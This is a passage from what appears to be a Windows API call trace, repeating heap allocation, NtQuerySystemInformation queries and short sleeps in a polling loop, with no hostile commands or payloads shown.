dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0245.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0245.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0245.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0245.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0245.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0245.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0245.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.047] Sleep (dwMilliseconds=0x110) [0245.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0245.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0245.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0245.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0245.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0245.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0245.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0245.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0245.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.068] Sleep (dwMilliseconds=0x110) [0245.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0245.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0245.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0245.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0245.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0245.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0245.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0245.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0245.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.080] Sleep (dwMilliseconds=0x110) [0245.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0245.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0245.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0245.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0245.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0245.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0245.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0245.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0245.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.098] Sleep (dwMilliseconds=0x110) [0245.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0245.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0245.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0245.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0245.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0245.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0245.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0245.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0245.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.114] Sleep (dwMilliseconds=0x110) [0245.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0245.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0245.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0245.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0245.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0245.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0245.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0245.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0245.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.131] Sleep (dwMilliseconds=0x110) [0245.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0245.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0245.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0245.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0245.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0245.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0245.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0245.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0245.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.146] Sleep (dwMilliseconds=0x110) [0245.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0245.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0245.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0245.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0245.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0245.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0245.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0245.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0245.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.156] Sleep (dwMilliseconds=0x110) [0245.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0245.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0245.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0245.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0245.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0245.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.242] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0245.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0245.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.243] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0245.243] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.244] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.244] Sleep (dwMilliseconds=0x110) [0245.289] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0245.289] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.290] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0245.290] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0245.290] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.291] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0245.291] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0245.292] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.293] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0245.293] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0245.293] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.293] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0245.293] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.294] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.294] Sleep (dwMilliseconds=0x110) [0245.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0245.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0245.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0245.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0245.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0245.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0245.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0245.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0245.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.318] Sleep (dwMilliseconds=0x110) [0245.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0245.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0245.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0245.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0245.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0245.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0245.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0245.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0245.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.334] Sleep (dwMilliseconds=0x110) [0245.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0245.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0245.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0245.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0245.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0245.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0245.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0245.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0245.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.344] Sleep (dwMilliseconds=0x110) [0245.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0245.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0245.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0245.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0245.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0245.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0245.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0245.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0245.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0245.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0245.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0245.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0245.364] Sleep (dwMilliseconds=0x110) [0245.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0245.372] NtQuerySystemInformation (in: 